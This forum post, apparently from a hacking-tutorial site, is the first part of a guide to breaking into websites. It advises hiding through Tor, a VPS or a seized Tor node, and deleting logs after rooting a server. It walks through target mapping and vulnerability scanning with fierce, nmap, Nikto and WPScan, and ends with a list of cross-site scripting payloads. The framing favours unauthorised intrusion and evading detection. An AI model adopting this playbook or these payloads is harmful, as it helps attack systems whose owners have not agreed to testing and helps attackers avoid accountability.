Forum Thread: How to Hack a Website. Part 1

Part 1: Staying Anonymous

1.) Install Whonix - "Whonix is a Debian GNU/Linux based security-focused Linux distribution. It aims to provide privacy, security and anonymity on the internet. The operating system consists of two virtual machines, a "Workstation" and a Tor "Gateway", running Debian GNU/Linux." Basically: Whonix will send all your requests through Tor.

2.) That step is for testing. Do not actually hack over Tor! You could use a virtual private server based in Sweden or something, or you could also seize a tor node and make it your own. There are always multiple options for something. Using a virtual private server is usually the best way to go. I recommend that myself.

3.) Once you have rooted the server, remember to remove all the logs. Keep that in mind.

4.) Use realistic user-agents. You can use this one for example: Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)

5.) This step is common sense. Do not tell anyone about your hacks. You could, I guess, tell them to online people while using a virtual private network, but not to in real life people. This is what will get you caught, eventually.

Part 2: Mapping out the target

1.) Mapping out a target is a crucial step! We must always remember that to hack your target, you must find a vulnerability. To find one, you must know your target, entirely!

2.) Use a DNS Domain Scanner - You could use Fierce to find subdomains in a target. If you're using Kali Linux, just type in fierce.pl -dns website.com

3.) Check out all those websites. You might find something good. A login vulnerable to SQL Injection, possibly.

Part 3: Vulnerability finding

1.) Scan the services with nmap

2.) Maybe they have an FTP server that allows anonymous read/write access to something quite important. Believe it or not, some do.

3.) Maybe it has an old software. You could most probably find an exploit for it online. :)

4.) REMEMBER TO LOOK AT ALL THE SUBDOMAINS!

5.) You can run Nikto (A vulnerability scanner). Nikto will do automated requests and find a vulnerability in the system.

6.) Once you know what software the website is running, e.g Wordpress, use WPScan.

I will show you how to get r00t in the next episode.

For a treat, I'll give you guys this:

Multiple and advanced XSS requests:

<IMG SRC=/ onerror="alert('NULLBYTE')"></img>
<svg onload="alert('nullbyte')" />
<svg/onLoad=alert(1)>
"><svg/onload=alert(/null/)>
";alert(/null/);a =" \' nullbyte
#!"><img src=1 onerror=prompt(null)>//
x" autofocus onfocus="alert('null')
Sos" onmouseover="alert('null')"/
"></iframe><svg/onload=alert(/null/)>
"><svg><script>/<@/>alert(1337)</script>
<body onhashchange=alert(1337)>
"><svg onload=alert(1337)>

Get The Null Byte Newsletter

Never miss a new hacking or security guide

1 Response

Yep. I know. I didn't have type. That's why I didn't show how to get r00t.

Share Your Thoughts

  • Hot
  • Active